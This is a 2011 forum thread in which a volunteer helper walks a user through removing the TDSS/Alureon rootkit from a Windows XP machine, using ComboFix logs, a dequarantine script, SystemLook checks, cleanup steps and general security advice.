[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Skype\\Phone\\Skype.exe"=
"c:\\mjusbsp\\magicJack.exe"=
"c:\\Program Files\\Parsons\\QuickVerse\\QuickVerse\\qvwin.exe"=
"c:\\Documents and Settings\\admin\\Application Data\\mjusbsp\\magicJack.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5060:UDP"= 5060:UDP:UDP
"5070:UDP"= 5070:UDP:UDP
"49152:UDP"= 49152:UDP:UDP
"65535:UDP"= 65535:UDP:UDP
"443:TCP"= 443:TCP:TCP
.
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [2/17/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [5/10/2010 2:41 PM 67656]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\Avira\AntiVir Desktop\sched.exe [6/13/2011 2:11 AM 136360]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [9/20/2007 6:03 PM 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [8/1/2009 1:17 PM 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [9/4/2009 9:59 AM 366640]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [7/26/2005 6:19 PM 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\LOCALS~1\Temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2/20/2008 4:50 PM 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [9/4/2009 9:59 AM 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\System32\svchost.exe -k nosGetPlusHelper [8/15/2009 12:39 AM 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [1/6/2010 4:16 PM 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\Ashampoo\Ashampoo WinOptimizer 7\DfSdkS.exe [4/13/2011 1:16 PM 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [10/19/2010 10:04 AM 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2/27/2011 5:32 PM 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\NLSSRV32.EXE --> c:\windows\system32\NLSSRV32.EXE [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
getPlusHelper REG_MULTI_SZ getPlusHelper
nosGetPlusHelper REG_MULTI_SZ nosGetPlusHelper
.
Contents of the 'Scheduled Tasks' folder
.
2011-06-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-19 14:04]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236}: NameServer = 67.90.152.122,67.107.71.186
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-16 18:00
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\System\ControlSet009\Services\ASFWHide]
"ImagePath"="\??\c:\docume~1\admin\LOCALS~1\Temp\ASFWHide"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3277941142-1728969546-3919492650-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(920)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
- - - - - - - > 'explorer.exe'(2460)
c:\windows\system32\WININET.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\IEFRAME.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Avira\AntiVir Desktop\avguard.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Avira\AntiVir Desktop\avshadow.exe
.
**************************************************************************
.
Completion time: 2011-06-16 18:11:02 - machine was rebooted
ComboFix-quarantined-files.txt 2011-06-16 22:10
ComboFix2.txt 2011-06-13 21:16
ComboFix3.txt 2011-06-13 06:03
.
Pre-Run: 58,030,985,216 bytes free
Post-Run: 58,092,498,944 bytes free
.
- - End Of File - - 81EB18F435740BA7FCE77D7B39DCAD1

Re: redirected searches and email problems

Unread postby melboy » June 16th, 2011, 6:44 pm

Hi

The hidden $…$ folders under C:\WINDOWS belong to the operating system — on XP they are typically the $NtUninstallKB…$ folders that hold the backups needed to uninstall Windows updates, so they should be left alone. Generally, Windows hides things it doesn't want people tinkering with. :D

Run this Cfscript. It shouldn't do a full scan and you'll be presented with a log; DeQuarantine_log.txt.

Please post that log and then we can proceed with the final stage.

Are things still running well?


COMBOFIX-Script

A word of warning: Please do not run ComboFix on your own. This tool is not a toy and not for everyday use.


  • Please open Notepad (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the code box below:

    DeQuarantine:: 
    C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir
    C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir
    Quit::
    

  • Save this as CFScript.txt and change the "Save as type" to "All Files" and place it on your desktop.

  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before following the steps below. They can interfere with ComboFix or remove some of its embedded files, which may cause "unpredictable results". Re-enable them as soon as ComboFix has finished.
  • If you need help to disable your protection programs see here.
  • Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
  • When finished, it shall produce a log for you DeQuarantine_log.txt. Copy and paste the contents of the log in your next reply.

CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.

Re: redirected searches and email problems

Unread postby ard » June 17th, 2011, 2:43 am

Hi -

things seem to be running fine.


I ran CFScript as you said - I got a full-screen display of the text file - after 2 hours of no activity I stopped it. There was no DeQuarantine_log.txt, only a dequarantine.txt file:

C:\Qoobox\Quarantine\C\BibleSpeak\BibleSpeak.exe.vir -> C:\BibleSpeak\BibleSpeak.exe ( 2768896 bytes )
C:\Qoobox\Quarantine\C\WINDOWS\stic1690.exe.vir -> C:\WINDOWS\stic1690.exe ( 221184 bytes )

Re: redirected searches and email problems

Unread postby melboy » June 17th, 2011, 4:45 pm

The logs now look good so with everything running well the PC seems at this stage to be free of malware. Install Flash Player and then we'll move to the final post & finishing cleaning up, all being well. ;)

Visit this page and run the Flash Player uninstaller first : http://kb2.adobe.com/cps/141/tn_14157.html


Then visit this site and install Flash Player : http://get.adobe.com/flashplayer/


Let me know how things are after that.

Re: redirected searches and email problems

Unread postby ard » June 17th, 2011, 10:00 pm

Hi -

Flash Player uninstaller done

install Flash Player done

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 5:50 am

Hi

Good. Is everything OK with your e-mails now?

Before we uninstall it, I just want to check that ComboFix restored those files correctly, and then we should be all done. Looking again at the DeQuarantine log, I would have expected to see confirmation that the files had indeed been copied over:
2 File(s) copied



SystemLook

You should still have this on your desktop.

  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    :file
    C:\BibleSpeak\BibleSpeak.exe 
    C:\WINDOWS\stic1690.exe

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt

Re: redirected searches and email problems

Unread postby ard » June 18th, 2011, 10:12 am

Hi -

things looking very good.

SystemLook 04.09.10 by jpshortstuff
Log created at 10:00 on 18/06/2011 by admin
Administrator - Elevation successful

========== file ==========

C:\BibleSpeak\BibleSpeak.exe - File found and opened.
MD5: 91A4A401DA0F5ECDF5CDE3548B487AAD
Created at 03:12 on 17/06/2011
Modified at 04:50 on 17/06/2011
Size: 2768896 bytes
Attributes: --a----
FileDescription: Powerful Bible Software That Speaks!
FileVersion: 4.0
ProductVersion: 4.0
OriginalFilename: BibleSpeak.exe
InternalName: BibleSpeak
ProductName: BibleSpeak 4.0
CompanyName: Q-Software
LegalCopyright: Copyright (C) 2001-2008 Q-Software

C:\WINDOWS\stic1690.exe - File found and opened.
MD5: B8F2896EF8A3F6A19B4441409F5CC723
Created at 03:12 on 17/06/2011
Modified at 04:50 on 17/06/2011
Size: 221184 bytes
Attributes: --a----
FileDescription: StiCap Application
FileVersion: 1.26
ProductVersion: 1.26
OriginalFilename: StiCap1690.exe

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 10:30 am

Hi

Your log now appears to be clean. Congratulations!
This is my general post for when your logs show no more signs of malware ;) - Please let me know if you still are having problems with your computer and what these problems are. If all is well, please continue with the instructions below.



Uninstall Combofix

We Need to Remove ComboFix

  1. Please go to Start -> Run
  2. Enter "ComboFix /uninstall" (without quotes). Note the space between "ComboFix" and "/uninstall", it needs to be there.
  3. Press OK (Or hit enter).
  4. Allow ComboFix to remove itself.



OTC by OldTimer

Download OTC by Old Timer and save it to your Desktop.

  • Double-click OTC.exe
  • Click the CleanUp! button
  • Select Yes when the "Begin cleanup Process?" prompt appears
  • If you are prompted to Reboot during the cleanup, select Yes
  • The tool will delete itself once it finishes; if it does not, delete it yourself


========================================

You have signs of "leftovers" in the logs from incomplete antivirus software removal. I would download and run the relevant removal tools for those programs. They work in much the same way as the Vipre removal tool (VPPClean.exe) that I had you run previously.

http://www.avast.com/uninstall-utility <-- Avast Uninstall Utility
http://www.avg.com/us-en/utilities <-- AVG Remover

=========================================


Your computer was infected with a ROOTKIT. In particular, the TDSS rootkit, also known as Win32/Alureon. A rootkit is a set of software tools intended for concealing running processes, files or system data from the operating system.

Due to its rootkit functionality, it's impossible to tell what may have been done when the system was compromised.

Therefore it may be prudent to:

  1. Call all your banks, financial institutions, credit card companies and inform them that you may be a victim of identity theft and put a watch on your accounts.
  2. Change all your passwords (ISP login password, your email address(es) passwords, financial accounts, PayPal, eBay, Amazon, online groups and forums and any other online activities you carry out which require a username and password). Where possible, change them from a different computer that you know to be clean, since anything typed on the infected machine before it was cleaned may have been captured.

Windows Rootkits

How do I respond to a possible identity theft and how do I prevent it


=========================================


General Security and Computer Health

Below are some steps to follow in order to dramatically lower the chances of reinfection. You may have already implemented some of the steps below, however you should follow any steps that you have not already implemented.


  • Make sure that you keep your antivirus updated
    New viruses come out every minute, so it is essential that you have the latest signatures for your antivirus program to provide you with the best possible protection from malicious software.
    Note: You should only have one antivirus installed at a time. Having more than one antivirus program installed at once is likely to cause conflicts and may well decrease your overall protection as well as impairing the performance of your PC.
    Uninstall Tools for Major Antivirus Products

  • Security Updates for Windows, Internet Explorer & Microsoft Office
    Whenever a security problem in its software is found, Microsoft will usually create a patch so that after the patch is installed, attackers can't use the vulnerability to install malicious software on your PC. Keeping up with these patches will help to prevent malicious software being installed on your PC. Ensure you are registered for Windows updates via Start > right-click on My Computer > Properties > Automatic Updates tab or visit the Microsoft Update site on a regular basis.
    Note: The update process uses ActiveX, so you will need to use Internet Explorer for it and allow the ActiveX control to install.

  • Update Non-Microsoft Programs
    Microsoft isn't the only company whose products can contain security vulnerabilities. To check whether other programs running on your PC are in need of an update, you can use the Secunia Software Inspector - I suggest that you run it at least once a month.


Recommended Programs

I would recommend the download and installation of some or all of the following programs (if not already present), and the updating of them on a regular basis.

  • Malwarebytes' Anti-Malware
    As you already have Malwarebytes' Anti-Malware on board, I would keep it regularly updated and run regular quick scans with it. Malwarebytes' Anti-Malware is an anti-malware application that can thoroughly remove even the most advanced malware. The Full version can be used as an addition to an anti-virus and includes a number of features, including a built-in protection monitor that blocks malicious processes before they even start.
    Its IP Protection provides an additional layer of security for your computer by preventing access to known malicious IP addresses and IP ranges.

  • Hosts File
    For added protection you may also like to add a Hosts file. A simple explanation of what a Hosts file does is HERE, and for more information regarding Hosts files read HERE.

  • Use an alternative Internet Browser
    Many of the exploits are directed to users of Internet Explorer. Try using a different browser instead:
    Firefox
    Opera


Finally, I want to make one point very clear: it is absolutely essential to keep all of your security programs up to date.

Also please read this great article by Tony Klein So How Did I Get Infected In First Place

I'd be grateful if you could reply to this post so that I know you have read it and, if you've no other questions, the thread can be closed.

Happy surfing and stay clean!

Re: redirected searches and email problems

Unread postby ard » June 18th, 2011, 11:56 am

Hi -

1) ComboFix uninstall done

2) OTC by OldTimer done

3) Avast Uninstall done

4) AVG Remover done

currently reading your referenced materials

I had hoped we could reduce the 60-some system backup/restore points before we are done.

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 12:05 pm

Hi

You should find that System Restore has been reset - Please let me know if it hasn't.

Re: redirected searches and email problems

Unread postby ard » June 18th, 2011, 1:24 pm

Hi -

yes it was off - sorry

is it likely that the rootkit problem existed long before the visible network problems?

Re: redirected searches and email problems

Unread postby melboy » June 18th, 2011, 6:14 pm

Hi

If by "network problems" you mean "my searches are almost always redirected to unrelated sites", then the rootkit was the cause of this. When you first started noticing the redirects, that would have been only a very short while after infection by the rootkit.